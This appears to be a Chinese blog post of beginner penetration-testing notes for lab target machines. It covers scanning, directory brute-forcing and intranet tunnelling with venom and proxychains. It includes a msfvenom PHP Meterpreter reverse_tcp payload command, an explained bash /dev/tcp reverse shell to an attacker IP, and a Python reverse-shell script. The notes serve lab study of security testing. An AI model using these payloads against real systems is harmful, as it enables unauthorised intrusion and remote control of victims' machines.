web靶机渗透思路--web渗透笔记-思路,综合渗透笔记思路(入门)(待补全)

目录

信息收集

主机发现:

端口扫描

服务发现

路径爬取

代码注入

Shell脚本

内网信息收集

内网穿透


针对web靶机的渗透测试,可以根据以下思路进行操作:

1. 信息收集:收集目标网站的相关信息,包括域名、IP地址、服务器类型、网站架构等。

2. 漏洞扫描:使用漏洞扫描工具对目标网站进行扫描,发现可能存在的漏洞,如SQL注入、XSS、文件上传等。

3. 弱口令测试:对目标网站的登录界面、管理员后台等进行弱口令测试,尝试使用常见的弱口令进行登录。

4. 目录遍历:通过目录遍历攻击手法,尝试访问目标网站的敏感文件和目录,如配置文件、日志文件等。

5. 文件上传测试:对目标网站的文件上传功能进行测试,尝试上传恶意文件,并执行任意代码。

6. XSS攻击:通过输入恶意的脚本代码,尝试在目标网站上执行跨站脚本攻击。

7. SQL注入:对目标网站的数据库进行注入攻击,尝试获取敏感信息或执行恶意操作。

8. 文件包含漏洞:对目标网站的文件包含功能进行测试,尝试包含恶意文件并执行任意代码。

9. 远程代码执行:通过攻击目标网站的命令执行功能,尝试执行系统命令或上传木马等。

10. 后台管理漏洞:针对网站后台管理系统进行漏洞利用,如未授权访问、文件上传等。

11. 社会工程学攻击:通过伪装身份、钓鱼等手段,获取目标网站管理员或用户的敏感信息。

12. 渗透测试报告:整理测试过程中的漏洞和发现,编写渗透测试报告,详细记录测试结果和建议修复措施。

在进行渗透测试时,需要注意合法性和道德规范,仅在合法授权的情况下进行,避免对目标系统造成损害。

信息收集

主机发现:

  1. arp-scan -l
  2. nmap -sP 10.120.120.0/24
  3. netdiscover -r 10.120.120.0【查询与该主机同一网段内存活的主机】

端口扫描

利用nmap工具

  1. nmap -A 10.120.120.1 【进行扫描该主机的端口等】//发现开放的端口进行侦察,
  1. 80端口
  1. 进行路径扫描

drib http://10.120.120.1

drib http://10.120.120.1 -X .php 【扫描以.php后缀的url】

  1. 网页代码注入
  2. 弱口令爆破
  1. 22端口
  1. 弱口令爆破

服务发现

路径爬取

代码注入

Shell脚本

可以利用msfvenom生产shell注入脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.1.3 lport=8888 -f raw > /home/kali/Desktop/2.php

  1. 使用msfvenom工具生成一个PHP Meterpreterreverse_tcp payload
  2. 设置本地主机(监听连接的主机)的IP地址为172.16.1.3
  3. 设置本地主机上的监听端口为8888
  4. 使用-f raw选项将生成的payload以原始二进制形式输出。
  5. 将输出的内容重定向到/home/kali/Desktop/2.php文件。

      

https://img-blog.csdnimg.cn/img_convert/ba330de0142290626445a3a477d73f4c.png

这1.sh是一个简单的反向 shell 命令,通常用于在目标机器上建立与攻击者之间的网络连接。

解释如下:

bash:这是运行 Bash Shell 的命令。

-i:表示将 Bash Shell 运行在交互模式下,以便与用户进行交互。

&:这是重定向符号,用于将输出重定向到另一个地方。

/dev/tcp/192.168.184.145/5555:这是一个特殊路径,它代表了一个 TCP 网络连接。其中,192.168.184.145 是攻击者的 IP 地址,5555 是攻击者监听的端口号。

0>&1:这是将标准输入(文件描述符 0)重定向到标准输出(文件描述符 1)。这样,通过网络连接输入到目标机器的数据将被发送到攻击者的主机。

利用监听端口4444进行获取shell

Nc -nvlp 4444

找到注入点进行对应的脚本注入

利用Python3脚本注入                                                   

import socket,subprocess,os;

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("本地主机的IP地址",需要监听的端口));

os.dup2(s.fileno(),0);

os.dup2(s.fileno(),1);

os.dup2(s.fileno(),2);

p=subprocess.call(["/bin/sh","-i"]);

获取shell【成功页面如图】

内网信息收集

通过获取的shell进行收集信息

Hostname//查看主机名称

Uname -a查看内核信息

Uanem -r查看内核版本

Whoami  查看用户

Id 【可以查看当前的用户是什么权限】

Ls 【】

Pwd

Ifconfig

Ls /.dockerenv【查看是否存在dockerenv文件】

Cat /proc/1/cgroup 【查看当前是否为doceker容器,如果是A】

内网穿透

【主要利用 venom 工具进行渗透】

原理【在本地主机开放一个下载的端口,利用获取到shell的目标主机下载对应venom服务,在进行运行】

  1. 用Python3 -m http.server 80 开放下载的端口:

【开放服务端口,服务器运行后 会以当前命令运行目录作为http服务器根目录

【目的是为了让内网的机器上传客服端工具==利用已经拿到的的shell上传agent_linux_x64文件到目标服务器,并执行】

  1. 在获取shell的主机上下载venom服务:

  1. 在本地主机运行venom:

./admin_linux_x64 -lport 8888  【用Linux版本的工具 开放对应 8888端口】

 在获取到的shell主机上运行下载后的venom

./【获取的venom文件服务】 -rhost  对应的主机地址【在kali本地主机的地址】   IP -rport 8888

https://img-blog.csdnimg.cn/7bd83fc8c1c24bae9fc3b138e15a99b8.png

在本地主机上开启代理功能

show 【查看当前】

goto 1【运行到1节点】

socks 1080 【在本地开启一个1080端口的代理】

要利用proxychain挂上代理

【修改本地socks5的配置】

vi /etc/proxychains4.conf

利用kali的工具进行对内网的扫描

proxychains  namp -sT -Pn  【内网的地址】

漏洞利用

密码破解

本地提权

攻击代码修改

  • 28
    点赞
  • 48
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值